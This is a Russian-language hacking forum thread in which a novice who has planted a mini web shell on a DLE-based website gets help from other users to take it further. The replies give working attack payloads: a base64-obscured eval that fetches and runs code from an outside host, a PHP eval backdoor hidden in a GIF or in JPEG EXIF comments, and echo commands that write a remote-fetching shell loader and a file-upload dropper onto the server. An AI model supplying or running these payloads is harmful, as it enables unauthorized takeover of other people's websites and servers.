Здравствуйте, прочитал статью по заливке шеллов, приступил к практике и после заливки мини шелла процесс заморозился. Сайт на дле, /?cmd=phpinfo(); выводится, а все остальное предложенное в топике не работает(Hacking attempt!), помогите кто-нибудь до конца разобраться в этом не легком деле, буду очень Вам благодарен за помощь стукните кто шарит в личку
попробуй такой запрос Code: eval(file_get_contents(base64_decode (aHR0cDovL3pvcmdlZS1ydS5wLmh0L2ZpeDEudHh0)))%3b
огромное спасибо, заиклудился, а можно без искажений браузера показать что такое %3b (учусь, все надо знать )?
а если например открыть gif в том же notepad и дописать в конец <?php eval($_GET[cmd]); ?> то работает тока если в папке есть htaccess с строкой AddType application/x-httpd-php .gif . А если через exif код добавить будет без htaccess работать ?
А как его сервер сможет обработать если он скрипты читает как скрипты, а картинку, как картинку по расширениям... нет!
сам сделать же можешь http://www.chapelhill.homeip.net/horton/copies/edjpgcom/edjpgcom%20-%20A%20JPEG%20Comment%20Editor.htm перетаскивай картинку на ехе и пиши любой коммент хоть шелл
?cmd=echo "<?php file_put_contents('shell.php',file_get_contents('h ttp://site.com/shell.txt')); ?>" > 1.php site/1.php site/shell.php
что то не катит, вообще только заливщиками получается, другими способами описываемые тут, не получается, что я не так делаю, понять не могу. почему то такой способ не катит.
если не ошибаюсь allow_url_fopen должен быть включен для функции file_get_contents(); посмотри это в phpinfo();
таким же образом залей вот этот код PHP: <?php move_uploaded_file($_FILES['f']['tmp_name'],'./'.basename($_FILES['f']['name'])); ?> <form method="post" enctype="multipart/form-data"><input type="file" name="f"><input type="submit" value="ok"></form> и из него уже лей полноценный шелл
Каким образом? Через качалки? Мне как раз нужны альтерантивные варианты заливки, когда качалки не работают, например, через такой или подобный ему код: вообщем, с помощью обычной записи в файл, вот у меня и вопрос, с помощью passthru возможно реализовать такое?
Code: ?cmd=echo -e "<? move_uploaded_file($_FILES['f']['tmp_name'],'./'.basename($_FILES['f']['name'])); ?> \n<form method='post' enctype='multipart/form-data'><input type='file' name='f'><input type='submit' value='k'></form>" >> 2.php после по адресу /2.php, оттуда лей шелл.
с тобой все нормально? никого я не тролю, даже больше скажу, я реально профан в этой теме и всем кто отписался тут, благодарен.
спасибо за рабочий вариант, файл заливается, но в внутри вот это аплоадер соответственно не работает, как то не коректно он создает его.
норобуй в начале добавить вместо <? --- <?php такой открывающий тег! если в исходном коде увидишь опять код пхп, то в папке отключен пхп! тогда тут влообще по другому надо действовать!
